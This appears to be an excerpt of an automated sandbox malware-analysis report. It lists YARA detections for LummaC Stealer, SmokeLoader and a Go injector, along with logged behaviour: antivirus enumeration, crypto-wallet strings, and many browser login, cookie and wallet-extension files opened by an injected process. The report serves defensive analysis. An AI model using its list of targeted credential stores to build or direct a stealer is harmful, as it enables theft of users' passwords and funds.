                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Go Injector
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 8.0.60FC.exe.7ff7e7250000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.60FC.exe.7ff7e7250000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.2599552329.00007FF7E7790000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000000.2458376927.00007FF7E7790000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 60FC.exe PID: 5300, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\60FC.exe, type: DROPPED
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7784, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected SmokeLoader
                  Source: Yara matchFile source: 00000005.00000002.2008625039.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1766138054.00000000041B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2008687958.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1765878956.00000000026F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: BitLockerToGo.exe, 0000000D.00000003.2697510339.0000000002855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: llets/Electrum-LTCdo
                  Source: BitLockerToGo.exe, 0000000D.00000003.2677007579.000000000281E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                  Source: BitLockerToGo.exe, 0000000D.00000003.2642232685.00000000027CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                  Source: BitLockerToGo.exe, 0000000D.00000003.2642232685.00000000027FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: BitLockerToGo.exe, 0000000D.00000003.2677007579.000000000281E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: BitLockerToGo.exe, 0000000D.00000003.2677007579.000000000281E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                  Source: BitLockerToGo.exe, 0000000D.00000003.2642232685.00000000027FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                  Source: BitLockerToGo.exe, 0000000D.00000003.2642232685.0000000002808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: 6BC6.exe, 0000000A.00000002.4157872615.0000012B44247000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $'{0}' is not a valid KeyStore name.
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
